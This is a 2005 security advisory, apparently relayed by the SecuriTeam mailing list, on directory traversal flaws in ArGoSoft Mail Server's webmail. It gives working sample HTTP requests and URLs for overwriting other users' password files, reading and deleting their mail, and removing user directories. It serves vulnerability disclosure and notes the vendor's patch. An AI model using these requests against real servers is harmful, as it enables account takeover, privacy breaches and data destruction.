[NT] ArGoSoft Mail Server Webmail Multiple Directory Traversal Vulnerabilities

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  ArGoSoft Mail Server Webmail Multiple Directory Traversal Vulnerabilities
------------------------------------------------------------------------


SUMMARY

" <http://www.argosoft.com/mailserver/> ArGoSoft Mail Server is fully 
functional SMTP/POP3/Finger (Pro version also has IMAP module) server for 
Windows 95/98/NT/2000, which will let you turn your computer into the 
email system. It's very compact, takes about 1-5 Mb of disk space 
(depending on the version), does not have any specific memory 
requirements, and what is the most important - it's very easy to use."

Multiple directory traversal vulnerabilities were found in ArGoSoft Mail 
Server's Webmail that may be exploited by a authenticated mail user to 
upload files to arbitrary directories on the server, retrieve arbitrary 
files from the server, access other users' emails, and create/delete 
arbitrary directories on the server.

DETAILS

Vulnerable Systems:
 * ArGoSoft Mail Server version 1.8.7.3

Directory Traversal in Email Attachment Filename:
ArGoSoft Mail Server's Webmail allows a authenticated mail user to upload 
file attachments when composing an email. Lack of input validation of the 
supplied filename allows the user to upload files to arbitrary locations 
on the server. This may be exploited by a malicious mail user to upload 
and replace other users' password file (userdata.rec) with a copy that has 
known password, thus allowing him/her to authenticate as other users.

A sample malicious file upload HTTP request is shown below:
POST /attachfile HTTP/1.0
Host: localhost
Cookie: ams-auth=XXXXXXXXXXXXX
Content-Type: multipart/form-data; 
boundary=---------------------------24242261923581
Content-Length: 456
Connection: Close

-----------------------------24242261923581
Content-Disposition: form-data; name="x"

52
-----------------------------24242261923581
Content-Disposition: form-data; name="y"

10
-----------------------------24242261923581
Content-Disposition: form-data; name="attfile"; 
filename="../../test2/userdata.rec"
Content-Type: application/octet-stream

__VER__1.8.7.3
XXXXXXXX
test2

test2
0
1
0

-----------------------------24242261923581--

Directory Traversal in _msgatt.rec:
When the Webmail user is composing an email, all attachments uploaded for 
that email will be saved in the following temporary directory.

C:\Program Files\ArGo Software Design\Mail 
Server\_users\_nodomain\username\_tempatt\ 

A sample listing of this directory is shown below:

Directory of C:\Program Files\ArGo Software Design\Mail 
Server\_users\_nodomain\test\_tempatt
02/09/2005 08:18p <DIR> .
02/09/2005 08:18p <DIR> ..
02/09/2005 08:17p 90 inbox.msl
02/09/2005 08:18p 167 TESTFILE.txt // file attachment uploaded by user
02/09/2005 08:18p 13 _msgatt.rec
02/09/2005 08:18p 0 _msgbody.rec
02/09/2005 08:18p 136 _msgdata.rec
               5 File(s) 406 bytes


The server will create the file (_msgatt.rec) in this temporary directory. 
This file contains the filename of all file attachments that the user has 
uploaded while composing the current email. The user can control the 
contents of this file by uploading a file attachment with the same 
filename as this server generated file. The user uploaded copy will 
replace the one generated by the server.

By uploading a specially crafted _msgatt.rec containing directory 
traversal characters, it is possible to cause the server to send any 
arbitrary files on the server as attachment to the user. A malicious user 
may exploit this vulnerability to email other user's password file 
(userdata.rec) to himself.

A sample malicious _msgatt.rec file is shown below:

./../test2/userdata.rec

This malicious file, when uploaded as attachment and saved to the 
temporary directory, will contain two additional lines of server generated 
entry as shown below:

./../test2/userdata.rec
-
_msgatt.rec

To ensure that the email can be sent correctly, the malicious user must 
"detach" the last two files (i.e. "-" and "_msgatt.rec"). This can be 
trivially done via the web interface as shown below. Subsequently, when 
the user retrieves his email via IMAP, he'll be able to receive test2's 
userdata.rec file as attachment.

Directory traversal in /msg and /delete Folder Parameter:

The /msg link allows the Webmail user to view his/her emails. The full URL 
is :

http://[hostname]/msg?MsgNo=0&Folder=inbox&UIDL=sjo2z7plfizwvu3x

It is possible to view other user's email by using directory traversal 
characters in the Folder parameter and specifying a correct UIDL. The UIDL 
uniquely identifies the email and guessing the UIDL of another user's 
email is impractical. However, it possible to obtain a list of the UIDL of 
another user's emails by surfing to the following link while being 
authenticated. Note that inbox.msl only exists if the other user is 
currently authenticated. i.e. The server will create inbox.msl in the 
every user's temporary directory (see vulnerability b. above) only after 
he/she has authenticated.

http://[hostname]/_users/_nodomain/other_username/_tempatt/inbox.msl

Sample contents shown below:
j18mspvyiitdzxdw
zrr77aepklpadkv5
nuczv11pjysmrceu
10zptzip5g8ejlwx
ymufn1briuvp2ocu

It is then possible to retrieve the other user's emails using the 
following link.

http://[hostname]/msg?MsgNo=0&Folder=../other_username/inbox&UIDL=j18mspvyiitdzxdw

The /delete link, which allows the user to delete his/her own emails, is 
similarly vulnerable. A sample malicious POST request to /delete is shown 
below, this will delete mails belonging to user test2.

POST /delete HTTP/1.0
Host: localhost
Cookie: ams-auth=XXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Connection: Close

x=36&y=11&sel=0&act=1&folderselect=&j18mspvyiitdzxdw=on&Folder=../test2/inbox

Creating or Deleting Arbitrary Directories on the Server
Directory traversal in /folderadd and /folderdelete "Folder" parameter 
allows creating/deleting arbitrary directories on the server.

he /folderadd and /folderdelete links allows the Webmail user to 
create/delete mail folders. It is possible to use directory traversal 
characters in the Folder parameter to create/delete directories in 
arbitrary locations on the server. A malicious user may exploit this 
vulnerability to delete other users' entire mail directories, which is 
effectively the same as removing the users from the system.

The following will totally remove user test2 from the system:
http://[hostname]/folderdelete?Folder=../test2

Disclosure Timeline:
 * 06/02/05 - Vulnerability Discovered.
 * 08/02/05 - Initial Vendor Notification.
 * 08/02/05 - Received Notification from Vendor that Fixed Version was 
Released.
 * 09/02/05 - Public Release.

Vendor Status:
Vulnerability fixed.
Patch for vulnerable version released.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:chewkeong@security.org.sg> 
Tan Chew Keong.
The original article can be found at:  
<http://www.security.org.sg/vuln/argosoftmail1873.html> 
http://www.security.org.sg/vuln/argosoftmail1873.html



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.